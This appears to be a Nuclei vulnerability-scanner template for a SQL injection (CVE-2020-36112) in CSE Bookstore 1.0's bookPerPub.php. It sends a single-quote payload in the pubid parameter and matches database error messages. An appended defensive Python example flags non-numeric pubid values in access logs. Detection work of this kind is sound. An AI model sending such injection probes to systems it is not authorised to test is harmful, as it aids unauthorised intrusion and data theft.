2021-05-18 22:56:54 +00:00
id: CVE-2020-36112

info:
  name: CSE Bookstore 1.0 SQL Injection
  author: geeknik
  description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind, and OR error-based SQL injection in the pubid parameter of bookPerPub.php. Successful exploitation leads to an attacker dumping the entire database.
  reference: |
    - https://www.exploit-db.com/exploits/49314
    - https://www.tenable.com/cve/CVE-2020-36112
  severity: critical
  tags: cve,cve2020,sqli,cse

requests:
  - raw:
      - |
        GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: word
        part: body
        words:
          - "get book price failed! You have an error in your SQL syntax"
          - "Can't retrieve data You have an error in your SQL syntax"
        condition: or
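
Added example, not part of the original template: a defender-side counterpart to the matcher above that flags access-log requests to bookPerPub.php whose pubid is not a plain integer. It assumes combined-format access logs and that pubid is a numeric ID (the template uses 4); the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "bookPerPub.php"  # script named in the template

def suspicious_pubid(log_line):
    """Return the decoded pubid value if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + TARGET_SCRIPT):
        return None
    # parse_qs percent-decodes values, so 4%27 and 4' are treated alike;
    # keep_blank_values makes an empty "pubid=" visible as well.
    values = parse_qs(url.query, keep_blank_values=True).get("pubid", [])
    for value in values:
        # Assumption: a legitimate publisher id is a short run of digits.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, pubid) for each log line carrying a non-numeric pubid."""
    hits = []
    for line in lines:
        value = suspicious_pubid(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2021:10:00:00 +0000] "GET /ebook/bookPerPub.php?pubid=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jun/2021:10:00:05 +0000] "GET /ebook/bookPerPub.php?pubid=4%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jun/2021:10:00:06 +0000] "GET /ebook/bookPerPub.php?pubid=4\' HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jun/2021:10:00:09 +0000] "GET /ebook/index.php?pubid=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric pubid: {value!r}")
```

The same integer check, applied server-side before the value reaches the query, is the input-validation half of the fix; parameterized queries are the other half.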